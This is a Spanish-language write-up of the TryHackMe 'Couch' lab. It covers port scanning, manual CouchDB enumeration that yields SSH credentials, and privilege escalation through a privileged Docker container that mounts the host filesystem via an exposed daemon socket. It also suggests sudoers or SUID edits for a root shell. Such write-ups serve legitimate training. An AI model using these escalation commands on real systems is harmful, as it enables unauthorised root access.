

# Write-up

## Máquina Couch



#### Couch

Hack into a vulnerable database server that collects and stores data in JSON-based document formats, in this semi...

Autor: J0lm3d0







### Índice

1.	Introducción	2
2.	Enumeración de servicios y recopilación de información sensible	3
3.	Acceso a la máquina	<b>5</b>
4.	Escalada de privilegios	6





#### 1. Introducción

En este documento se recogen los pasos a seguir para la resolución de la máquina Couch de la plataforma TryHackMe. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resolución según la plataforma.

Para comenzar a atacar la máquina, debemos desplegarla desde la sala correspondiente de TryHackMe [https://tryhackme.com/room/couch]. Una vez desplegada, nos proporcionará la IP que se le ha asignado a la máquina (va variando con cada instancia desplegada) y podremos comenzar nuestro ataque.



#### 2. Enumeración de servicios y recopilación de información sensible

Para comenzar, realizo un escaneo de todo el rango de puertos TCP mediante la herramienta  ${\it Nmap}.$ 

PORT	STATE	SERVICE	REASON		
22/tcp	open	ssh	syn-ack	ttl	63
5984/tcp	open	couchdb	syn-ack	ttl	63

Figura 1: Escaneo de todo el rango de puertos TCP

En la figura 1 se puede observar los puertos que la máquina tiene abiertos. Después, aplico scripts básicos de enumeración y utilizo la flag -sV para intentar conocer la versión y servicio que están ejecutando cada uno de los puertos que he detectado abiertos (Figura 2).



Figura 2: Enumeración de los puertos abiertos

Veo que, aparte del servicio SSH, nos encontramos un servicio **Apache CouchDB**, que se trata una base de datos de documentos NoSQL de código abierto que recopila y almacena datos en documentos basados en JSON. A diferencia de las bases de datos relacionales, CouchDB utiliza un modelo de datos sin esquema, que simplifica la gestión de registros en varios dispositivos informáticos. Al detectar la versión utilizada en el escaneo, pruebo a buscar exploits mediante la herramienta **SearchSploit**, encontrando un exploit que puede aplicar en dicha versión, tal y como se observa en la figura 3.

<pre>(root offsec)-[/home/j0lm3d0/Documentos/THM/Couch] # searchsploit couchdb 1.6.1</pre>					
Exploit Title					
Apache <b>CouchDB</b> < 2.1.0 - Remote Code Execution					
Shellcodes: No Results Papers: No Results					

Figura 3: Página principal del servidor web



Pero, tras hacer varias pruebas, compruebo que la vulnerabilidad que explota este script está subsanada o no aplica, ya que al realizar la petición POST que ejecutaría el comando, me da una respuesta "401 Unauthorized". Para continuar, accedo al servicio a través del navegador, viendo así la página que se muestra en la figura 4.



Figura 4: Página "data" del servidor web

Buscando información en internet, encuentro el siguiente <u>artículo</u> en el que se explica como enumerar de forma manual las bases de datos de CouchDB a través de peticiones HTTP. En la figura 5, se ve el listado de bases de datos creadas, de las cuales las que más me llaman la atención son "\_users" y "secret".



Figura 5: Página "ip" del servidor web



#### 3. Acceso a la máquina

Tras enumerar más a fondo esas 2 bases de datos, encuentro en "secret" un documento que contiene una variable "passwordbackup" con unas credenciales, tal y como se puede observar en la figura 6.



Figura 6: Credenciales encontradas en un documento de la BD "secret"

Con las credenciales obtenidas, logro conectarme a la máquina por SSH y obtengo la primera flag, que puede verse en la figura 7.

atena@ubuntu:~\$	cat	user.txt
THM{ 1		)}

Figura 7: Flag de usuario no privilegiado



#### 4. Escalada de privilegios

Enumerando el sistema para escalar privilegios, descubro que root está ejecutando un contenedor de Docker, tal y como se observa en la figura 8. Además, en el histórico de "bash"había encontrado un comando en el que se ejecutaba un contenedor de Docker con privilegios.

root	821	0.0	1.2 395632 6424 ?	Ssl 11:42	0:02 /usr/bin/containerd
root	827	0.0	2.6 451700 13028 ?	Ssl 11:42	0:04 /usr/bin/dockerd -H=fd:// -H=tcp://127.0.0.1:2375

Figura 8: Proceso de docker en ejecución

Al volver a desplegar el histórico para copiar el comando, veo que se está creando una carpeta compartida en el directorio "/mnt" del contenedor, que contendrá el directorio raíz de la máquina anfitrión. Por tanto, al acceder al contenedor como root, puedo visualizar la flag que se encuentra en la máquina "host" en la ruta "/mnt/root/root.txt" y que puede verse en la figura 9. Para conseguir una shell en la máquina anfitrión, solo tendría que, por ejemplo, asignar un permiso SUID a cualquier binario que permita obtener una shell o editar el fichero "/etc/sudoers" para que el usuario "atena", no privilegiado, pueda ejecutar comandos como root sin proporcionar contraseña.

atena@ubuntu:~\$ docker -H 127.0.0.1:2375 runrm -itprivilegednet=host -v /:/mnt alpine								
/ # id								
uid=0(root)	gid=	=0(root)	groups=	0(root),1(bi	n),2	(dae	emon),3	3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # ls -la	/mnt,							
total 92								
drwxr-xr-x	22	root	root	4096	0ct		2020	
drwxr-xr-x		root	root	4096	Sep	27	21:25	
drwxr-xr-x		root	root	4096	0ct		2020	
drwxr-xr-x		root	root	4096	0ct		2020	boot
drwxr-xr-x	17	root	root	3700	Sep	27	18:42	dev
drwxr-xr-x	90	root	root	4096	Dec		2020	
drwxr-xr-x		root	root	4096	0ct		2020	home
lrwxrwxrwx		root	root	33	0ct		2020	<pre>initrd.img -&gt; boot/initrd.img-4.4.0-193-generic</pre>
lrwxrwxrwx		root	root	33	0ct		2020	<pre>initrd.img.old -&gt; boot/initrd.img-4.4.0-142-generic</pre>
drwxr-xr-x	20	root	root	4096	Dec		2020	
drwxr-xr-x		root	root	4096	0ct		2020	lib64
drwx		root	root	16384	0ct		2020	lost+found
drwxr-xr-x		root	root	4096	0ct		2020	media
drwxr-xr-x		root	root	4096	Feb		2019	
drwxr-xr-x		root	root	4096	Dec		2020	opt
dr-xr-xr-x	102	root	root		Sep	27	18:41	proc
drwx		root	root	4096	Dec		2020	
drwxr-xr-x	21	root	root	680	Sep	27	20:54	run
drwxr-xr-x		root	root	12288	Dec	18	2020	sbin
drwxr-xr-x		root	root	4096	Feb	26	2019	srv ////////////////////////////////////
dr-xr-xr-x	13	root	root		Sep	27	18:41	sys
drwxrwxrwt		root	root	4096	Sep	27	21:25	tmp
drwxr-xr-x	10	root	root	4096	0ct		2020	
drwxr-xr-x	11	root	root	4096	0ct	25	2020	
lrwxrwxrwx		root	root	30	0ct		2020	<pre>vmlinuz -&gt; boot/vmlinuz-4.4.0-193-generic</pre>
lrwxrwxrwx		root	root	30	0ct	25	2020	<pre>vmlinuz.old -&gt; boot/vmlinuz-4.4.0-142-generic</pre>
/ # cat /mnt/root/root.txt								
THM{			}					

Figura 9: Flag de root

Además, a modo de curiosidad, explico una forma para poder ejecutar el contenedor de la máquina víctima en nuestra máquina de atacante en este caso.

Al ver el proceso de Docker en el listado de procesos, observo que emplea la flag -H, utilizada para indicar el socket del demonio (daemon) de Docker al que se debe conectar el contenedor. El daemon de Docker es capaz de comunicarse con la API de Docker a través de 3 difentes tipos de socket: ünix", "tcpz "fd". En este caso, se especificaban 2 tipos, un socket "fdz un socket "tcp" que apuntaba a la propia máquina (localhost) por el puerto 2375.



De esta forma, como cuento con credenciales para el servicio SSH, podría realizar un Local Port Forwarding de tal forma que el puerto 2375 de mi máquina reenvíase las peticiones al puerto 2375 de la máquina víctima. De esta forma, podría lanzar el contenedor de docker en mi propia máquina, tal y como puede verse en las figuras 10 y 11.

<pre>(root@ offsec)-</pre>	[/home/j0lm3d0/Documentos/THM/Couch]
# ssh -l atena 1	0.10.254.50 -L 2375:localhost:2375
atena@10.10.254.50	's password:
Welcome to Ubuntu	16.04.7 LTS (GNU/Linux 4.4.0-193-gener
<pre>* Documentation: * Management: * Support:</pre>	<pre>https://help.ubuntu.com https://landscape.canonical.com https://ubuntu.com/advantage</pre>

Figura 10: Local Port Forwarding del puerto 2375 mediante SSH



Figura 11: Ejecución del contenedor en mi máquina de atacante

Más información sobre el daemon de Docker en la propia web.